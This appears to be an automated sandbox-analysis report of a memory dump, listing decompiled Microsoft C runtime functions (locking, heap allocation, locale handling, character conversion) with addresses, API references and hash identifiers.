Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00092DFB
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00092E0E
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00092E21
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00092E34
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00092E47
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00092E5A
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00092E6D
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00092E80
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00092E93
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00092EA6
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00092EB9
Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00092ECC

__mtinitlocks.LIBCMT ref: 0009173D
__mtterm.LIBCMT ref: 00091746

Part of subcall function 000917AE: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0009174B,0009112C,000ACCC0,00000014), ref: 00093182
Part of subcall function 000917AE: _free.LIBCMT ref: 00093189
Part of subcall function 000917AE: DeleteCriticalSection.KERNEL32(000AE058,?,?,0009174B,0009112C,000ACCC0,00000014), ref: 000931AB

__calloc_crt.LIBCMT ref: 0009176B
__initptd.LIBCMT ref: 0009178D
GetCurrentThreadId.KERNEL32 ref: 00091794

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: c48206ffb8bc8d9e264b49cfce2bbd915112893e8e746e359e8769a7c92b4387
Instruction ID: f523af66e95df6526ad77a22eabbf74b38ed8b487b10ca64d22ad3eb7b9f47ce
Opcode Fuzzy Hash: c48206ffb8bc8d9e264b49cfce2bbd915112893e8e746e359e8769a7c92b4387
Instruction Fuzzy Hash: 14F06D32B1C7132DFE747BB4AC076CA66E59F42730B200A2AF450C80E2FF108841A554

Uniqueness

Uniqueness Score: -1.00%

Function 0009879C, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0009879C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t10;
				signed int _t12;
				intOrPtr* _t16;
				intOrPtr* _t31;
				void* _t32;

				_push(8);
				_push(0xacf60);
				_t10 = E000927F0(__ebx, __edi, __esi);
				_t31 =  *((intOrPtr*)(_t32 + 8));
				if(_t31 != 0) {
					_t12 = E00093117(0xd);
					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
					if( *((intOrPtr*)(_t31 + 4)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0xae5b0) {
							E000932B6( *((intOrPtr*)(_t31 + 4)));
						}
					}
					 *(_t32 - 4) = 0xfffffffe;
					E00098DC1();
					if( *_t31 != 0) {
						E00093117(0xc);
						 *(_t32 - 4) = 1;
						E0009363B( *_t31);
						_t16 =  *_t31;
						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0xae2e8) {
							E000934E1(_t16);
						}
						 *(_t32 - 4) = 0xfffffffe;
						E00098DCD();
					}
					_t10 = E000932B6(_t31);
				}
				return E00092835(_t10);
			}

0x00098d1f
0x00098d21
0x00098d26
0x00098d2b
0x00098d30
0x00098d38
0x00098d3e
0x00098d47
0x00098d4c
0x00098d50
0x00098d5e
0x00098d63
0x00098d50
0x00098d64
0x00098d6b
0x00098d73
0x00098d77
0x00098d7d
0x00098d86
0x00098d8c
0x00098d90
0x00098d9f
0x00098da4
0x00098da5
0x00098dac
0x00098dac
0x00098db2
0x00098db7
0x00098dbd

APIs

__lock.LIBCMT ref: 00098D38

Part of subcall function 00093117: __mtinitlocknum.LIBCMT ref: 00093129
Part of subcall function 00093117: __amsg_exit.LIBCMT ref: 00093135
Part of subcall function 00093117: EnterCriticalSection.KERNEL32(00000000,?,000916CE,0000000D), ref: 00093142

_free.LIBCMT ref: 00098D5E

Part of subcall function 000932B6: HeapFree.KERNEL32(00000000,00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932CA
Part of subcall function 000932B6: GetLastError.KERNEL32(00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932DC

__lock.LIBCMT ref: 00098D77
___removelocaleref.LIBCMT ref: 00098D86
___freetlocinfo.LIBCMT ref: 00098D9F
_free.LIBCMT ref: 00098DB2

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 626533743-0
Opcode ID: 1e448fa958a5f00f155cebfdd84c875f69fa7854ada8d6ffe4d2348423fda6f9
Instruction ID: fbce04c7524830cdfee10fd8e8e1933519bdb381f3d3d7d163f2479a600d110c
Opcode Fuzzy Hash: 1e448fa958a5f00f155cebfdd84c875f69fa7854ada8d6ffe4d2348423fda6f9
Instruction Fuzzy Hash: DD019231507700EAEFB8ABA4D806799B3E05F12721F24851DF4A4663D2DF748A80FB00

Uniqueness

Uniqueness Score: -1.00%

Function 000B7BA7, Relevance: 7.7, APIs: 5, Instructions: 216COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 000B7C39
__alloca_probe_16.LIBCMT ref: 000B7D1E
__freea.LIBCMT ref: 000B7D8E
__freea.LIBCMT ref: 000B7D97
__freea.LIBCMT ref: 000B7DBC

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __freea$__alloca_probe_16
String ID:
API String ID: 3509577899-0
Opcode ID: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
Instruction ID: fbc4c938a06a13d33bb0ed137483eae0ef2289e907fc995bfa770250c3fd1d11
Opcode Fuzzy Hash: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
Instruction Fuzzy Hash: B151AF72604216ABDB258F64CC81EFF7BBAEF84790F154668FD09E6181EB34DC40D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 000959FE, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E000959FE(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0xefd1c, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0xf0a40 - _t7;
								if(__eflags == 0) {
									_t9 = E00094196(__eflags);
									 *_t9 = E000941EF(GetLastError());
									goto L17;
								} else {
									__eflags = E0009455B(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00094196(__eflags);
										 *_t12 = E000941EF(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0009455B(_t6, _t31);
						 *((intOrPtr*)(E00094196(__eflags))) = 0xc;
						goto L12;
					} else {
						E000932B6(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0009596C(__ebx, __edx, __edi, _a8);
				}
			}

0x00095a05
0x00095a13
0x00095a16
0x00095a18
0x00095a27
0x00095a5a
0x00095a5a
0x00095a5d
0x00000000
0x00000000
0x00095a2a
0x00095a2c
0x00095a2e
0x00095a2e
0x00095a2e
0x00095a3b
0x00095a41
0x00095a43
0x00095a45
0x00095aa5
0x00095aa5
0x00095a47
0x00095a47
0x00095a4d
0x00095a8f
0x00095aa3
0x00000000
0x00095a4f
0x00095a56
0x00095a58
0x00095a77
0x00095a8b
0x00095a71
0x00095a71
0x00095a71
0x00000000
0x00000000
0x00000000
0x00095a58
0x00095a4d
0x00000000
0x00095a73
0x00095a60
0x00095a6b
0x00000000
0x00095a1a
0x00095a1d
0x00095a23
0x00095a23
0x00095a74
0x00095a76
0x00095a07
0x00095a11
0x00095a11

APIs

_malloc.LIBCMT ref: 00095A0A

Part of subcall function 0009596C: __FF_MSGBANNER.LIBCMT ref: 00095983
Part of subcall function 0009596C: __NMSG_WRITE.LIBCMT ref: 0009598A
Part of subcall function 0009596C: HeapAlloc.KERNEL32(007C0000,00000000,00000001,00000000,00000000,00000000,?,0009334C,00000000,00000000,00000000,00000000,?,00093201,00000018,000ACDB0), ref: 000959AF

_free.LIBCMT ref: 00095A1D

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: dd909db95a92bd5af9694876447f1d933b4fdd946849ecf6ab766cd93eccd6cc
Instruction ID: 1553e9ff81819ab1d4e1e770a093666b30eab558416d13de368e2a317615a408
Opcode Fuzzy Hash: dd909db95a92bd5af9694876447f1d933b4fdd946849ecf6ab766cd93eccd6cc
Instruction Fuzzy Hash: 5F115C31404E11AFDF726F71AC45EAE37D4AF14362F104625F9099A153EF348D41B799

Uniqueness

Uniqueness Score: -1.00%

Function 0009F3F6, Relevance: 6.1, APIs: 4, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009F3F6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E000937C4( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E0009F121( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00094196(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x0009f3fe
0x0009f403
0x0009f41d
0x00000000
0x0009f41d
0x0009f405
0x0009f40a
0x00000000
0x00000000
0x0009f40f
0x0009f42c
0x0009f431
0x0009f434
0x0009f43b
0x0009f45a
0x0009f461
0x0009f463
0x0009f4a7
0x0009f4b6
0x0009f4c4
0x0009f4c6
0x0009f4d6
0x0009f4d6
0x0009f4da
0x0009f4dc
0x0009f4df
0x0009f4df
0x0009f4df
0x0009f4df
0x00000000
0x0009f4e5
0x0009f4c8
0x0009f4c8
0x0009f4cd
0x0009f4cd
0x0009f4d0
0x00000000
0x0009f4d0
0x0009f465
0x0009f468
0x0009f46c
0x0009f495
0x0009f495
0x0009f498
0x0009f498
0x00000000
0x00000000
0x0009f49a
0x0009f49e
0x00000000
0x00000000
0x0009f4a0
0x0009f4a0
0x00000000
0x0009f4a0
0x0009f46e
0x0009f471
0x00000000
0x00000000
0x0009f475
0x0009f488
0x0009f48e
0x0009f491
0x0009f493
0x00000000
0x00000000
0x00000000
0x0009f493
0x0009f43d
0x0009f440
0x0009f442
0x0009f447
0x0009f447
0x0009f44c
0x00000000
0x0009f44c
0x0009f411
0x0009f416
0x0009f41a
0x0009f41a
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0009F42C
__isleadbyte_l.LIBCMT ref: 0009F45A
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0009F488
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0009F4BE

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3df1b00145f12a4512da01488e1d6a11e37ff5d115a60e4c71a3c1b68d74b90c
Instruction ID: 7f8a3c4fb2c549e0fe49e2a640808703a2f57b49dcae0c383259daf0d6299c63
Opcode Fuzzy Hash: 3df1b00145f12a4512da01488e1d6a11e37ff5d115a60e4c71a3c1b68d74b90c
Instruction Fuzzy Hash: 8F318A31604247ABDF218E65D884BBB7BF5FF41320F158539E864DB1A1E730E891EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000987A1, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000987A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t28;
				intOrPtr* _t40;
				void* _t41;

				_push(0xc);
				_push(0xacf38);
				E000927F0(__ebx, __edi, __esi);
				_t28 = E000915FE();
				_t40 = E000932EE(8, 1);
				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
				_t43 = _t40;
				if(_t40 != 0) {
					E000936DB(_t28, __edx, 1, _t40, __eflags);
					E00093AF6(_t28, __edx, 1, _t40, __eflags);
					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
					E00093117(0xc);
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					E0009344C( *_t40);
					 *(_t41 - 4) = 0xfffffffe;
					E00098E70();
					E00093117(0xd);
					 *(_t41 - 4) = 1;
					asm("lock xadd [eax], edi");
					__eflags = 2;
					 *(_t41 - 4) = 0xfffffffe;
					E00098E7C();
					_t24 = _t40;
				} else {
					 *((intOrPtr*)(E00094196(_t43))) = 0xc;
					_t24 = 0;
				}
				return E00092835(_t24);
			}

0x00098dd6
0x00098dd8
0x00098ddd
0x00098de7
0x00098df6
0x00098df8
0x00098dfb
0x00098dfd
0x00098e0e
0x00098e13
0x00098e1b
0x00098e20
0x00098e25
0x00098e2b
0x00098e31
0x00098e37
0x00098e3e
0x00098e45
0x00098e4b
0x00098e51
0x00098e55
0x00098e56
0x00098e5d
0x00098e62
0x00098dff
0x00098e04
0x00098e0a
0x00098e0a
0x00098e69

APIs

Part of subcall function 000915FE: __getptd_noexit.LIBCMT ref: 000915FF
Part of subcall function 000915FE: __amsg_exit.LIBCMT ref: 0009160C

__calloc_crt.LIBCMT ref: 00098DEF

Part of subcall function 000932EE: __calloc_impl.LIBCMT ref: 000932FD

__lock.LIBCMT ref: 00098E25
___addlocaleref.LIBCMT ref: 00098E31
__lock.LIBCMT ref: 00098E45

Part of subcall function 00094196: __getptd_noexit.LIBCMT ref: 00094196

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
String ID:
API String ID: 2580527540-0
Opcode ID: dd3769bbd20fc9da5bd2df8bec4adecbc9aab997d8f80dd9a327ca0fdac26da6
Instruction ID: d65d612fa01061dc693ace4b5ae9497124216b101f9e1fde085a9191db80e57c
Opcode Fuzzy Hash: dd3769bbd20fc9da5bd2df8bec4adecbc9aab997d8f80dd9a327ca0fdac26da6
Instruction Fuzzy Hash: C0014031605301ABDF20BFB89903B9E77E0AF85720F118149F4559B3D3DE745E41AB65

Uniqueness

Uniqueness Score: -1.00%

Function 000A2F81, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A2F81(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E000A34F0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E000A3025(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E000A37A4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E000A36C5(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x000a2f84
0x000a2f8a
0x000a2ffd
0x00000000
0x000a2f91
0x000a2f91
0x000a2f94
0x000a2faf
0x000a2fb2
0x000a2fd2
0x000a2fe4
0x000a2fb4
0x000a2fb4
0x000a2fb7
0x00000000
0x000a2fb9
0x000a2fcb
0x000a2fcb
0x000a2fb7
0x000a3002
0x000a3006
0x000a2f96
0x000a2fae
0x000a2fae
0x000a2f94

APIs

__cftof_l.LIBCMT ref: 000A2FA5

Part of subcall function 000A36C5: __fltout2.LIBCMT ref: 000A36EE

__cftog_l.LIBCMT ref: 000A2FCB
__cftoe_l.LIBCMT ref: 000A2FFD

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 6b66d0d94d8bd47282ee870131df05e36bfc81e154958616fb2ecbfa8cdeb90a
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: 38014B7200014ABFCF665EC8DC02CEE3F76BF1A354B598425FA1858132D236CAB1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 000B2892, Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 000B2892
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 000B2897
___vcrt_initialize_locks.LIBVCRUNTIME ref: 000B289C

Part of subcall function 000B2AB1: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 000B2AC2

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 000B28B1

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction ID: 076e88ccc9718437c575008777e8cab2d03416b5f3964c490b9f577175bbfb93
Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction Fuzzy Hash: 51C09208412220932CB03FB0322B2EE23804FF77C8BEB28C2BC4127503CE0A450BA833

Uniqueness

Uniqueness Score: -1.00%

Function 000B674A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 000B678E

Strings

X&A, xrefs: 000B6836
h&A, xrefs: 000B6760

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: X&A$h&A
API String ID: 3903695350-2460073903
Opcode ID: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
Instruction ID: 557f82db5e1bbd8a4c032ae3f52a115d9b52837dead3413397cda5a1ce4e617c
Opcode Fuzzy Hash: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
Instruction Fuzzy Hash: 09317C31A04701AFEB70AA78D845BDAB3F8EF00710F144929E959D7192DF3AED948B10

Uniqueness

Uniqueness Score: -1.00%

Function 000986D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E000986D1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t4;
				void* _t15;
				void* _t17;

				_push(8);
				_push(0xacfc0);
				_t4 = E000927F0(__ebx, __edi, __esi);
				_t17 =  *0xae2e4 - 0xae2e8; // 0xae2e8
				if(_t17 != 0) {
					E00093117(0xc);
					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
					 *0xae2e4 = E0009375B("��", 0xae2e8);
					 *(_t15 - 4) = 0xfffffffe;
					_t4 = E0009871A();
				}
				return E00092835(_t4);
			}

0x000986d1
0x000986d3
0x000986d8
0x000986e2
0x000986e8
0x000986ec
0x000986f2
0x00098703
0x00098708
0x0009870f
0x0009870f
0x00098719

APIs

__lock.LIBCMT ref: 000986EC

Part of subcall function 00093117: __mtinitlocknum.LIBCMT ref: 00093129
Part of subcall function 00093117: __amsg_exit.LIBCMT ref: 00093135
Part of subcall function 00093117: EnterCriticalSection.KERNEL32(00000000,?,000916CE,0000000D), ref: 00093142

__updatetlocinfoEx_nolock.LIBCMT ref: 000986FC

Part of subcall function 0009375B: ___addlocaleref.LIBCMT ref: 00093777
Part of subcall function 0009375B: ___removelocaleref.LIBCMT ref: 00093782
Part of subcall function 0009375B: ___freetlocinfo.LIBCMT ref: 00093796

Strings

, xrefs: 000986E2, 000986F7, 00098703

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__amsg_exit__lock__mtinitlocknum__updatetlocinfo
String ID:
API String ID: 236788210-2599400749
Opcode ID: 56d8877799b0669b77fb8b5540cf9d49b1b70e3c8cfed34379f379e2a7dbfaaf
Instruction ID: 6fe879db6dbd93f9d9499297c198aab8f3acdae90320a32ca93300a83fd796fe
